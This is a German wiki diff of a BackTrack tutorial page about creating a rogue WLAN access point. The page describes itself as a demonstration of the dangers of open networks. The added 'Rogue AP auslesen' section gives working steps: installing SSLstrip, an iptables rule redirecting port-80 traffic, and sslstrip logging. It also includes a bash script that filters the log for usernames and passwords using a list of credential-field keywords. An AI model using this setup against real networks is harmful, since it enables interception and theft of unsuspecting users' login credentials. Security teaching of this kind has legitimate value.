Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen angezeigt.

--- backtrack-tutorials [2012/09/17 23:54] – [Titel 2] tom
+++ backtrack-tutorials [2025/05/03 09:10] (aktuell) – Externe Bearbeitung 127.0.0.1
@@ Zeile 144: / Zeile 144: @@
   aircrack-ng -b 00:00:..... <DATEI-NAME VON VORHERIGEM PUNKT>
-====== Titel 1 ======
 ===== AccessPoint erstellen =====
 Um zu demonstrieren wie gefährlich offene WLAN-AccessPoints sein können.
-=== Links ===
+==== Links ====
 [[http://teh-geek.com/?p=512|FAke AccessPoint]]
@@ Zeile 156: / Zeile 156: @@
 [[http://exploit.co.il/hacking/set-fake-access-point-backtrack5/|Setup a fake AccessPoint]]
+[[http://www.searchsecurity.de/themenbereiche/netzwerksicherheit/wireless-security/articles/298360| Bericht über offene WLANs.]]
+[[http://www.wardriving-forum.de/wiki/Airbase-Tutorial/Eigenen_AP_erstellen|Tutorial von Wardriving]]\\
+dhcpd.conf und iptables sehen interessant aus
+[[http://0x80.org/blog/?p=131|Tutorial von 0x80]]\\
+User mit Metasploit überwachen
+[[http://xylos.wikidot.com/howto-linux-fakeapscript|ausführliches, konfigurierbares Skript]]
+[[http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/|Fake-AP, sslstrip, driftnet]]
+[[http://www.backtrack-linux.org/forums/showthread.php?t=1939|Einträge zu iptables sind interessant]]
-=== Tutorial ===
+==== Tutorial Rogue AP erstellen ====
 Als erstes installieren wir den dhcp Server:\\
 nach dieser Vorlage [[http://www.securityaddicted.com/2012/03/16/how-to-create-a-fake-ap-on-backtrack-5-r2/|Fake AP mit Skript]]
@@ Zeile 231: / Zeile 243: @@
   echo 0 > /proc/sys/net/ipv4/ip_forward
   airmon-ng stop mon0
+==== Tutorial Rogue AP auslesen ====
+Jetzt wo der Server läuft können wir uns daran machen, den Verkehr auszulesen. Dazu müssen wir als erstes SSLstrip installieren:
+  $ cd /pentest/web/sslstrip/
+  $ python setup.py install
+Iptables für SSLstrip
+  $ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
+SSLstrip starten mit folgenden Optionen:
+  $ sslstrip -a -f -k -w /root/sslstrip.log
+diese Datei ist riesig und mit vielen Informationen bestückt. Damit wir nur die relevanten Daten erhalten, bauen wir uns ein Skript mit folgendem Inhalt:
+  #!/bin/bash
+  echo "Do you want to save passwords to a file? (Y=keep)"
+  echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
+  read -e keeppd
+  if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then
+          cat /root/sslstrip.log  |
+          awk -F "&" '!/GET/ && !/if/  !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' |
+          awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
+          egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user=|username=|login=|credential=|_user|_pwd=|email_address=" |
+          awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt
+          if [ -f "/root/filename.pass.txt" ]; then
+                  echo "Passwords saved !"
+                  else echo "Error while saving passwords"
+          fi
+          else echo "Password saving skipped."
+  fi
+  rm /root/filename.txt
+  echo -e "\nTemporary files deleted."
+Das Skript kann noch angepasst werden. Danach das Skript ausführbar machen:
+  $ chmod +x Skript.sh
+und starten (Abfrage mit "Y" beantworten.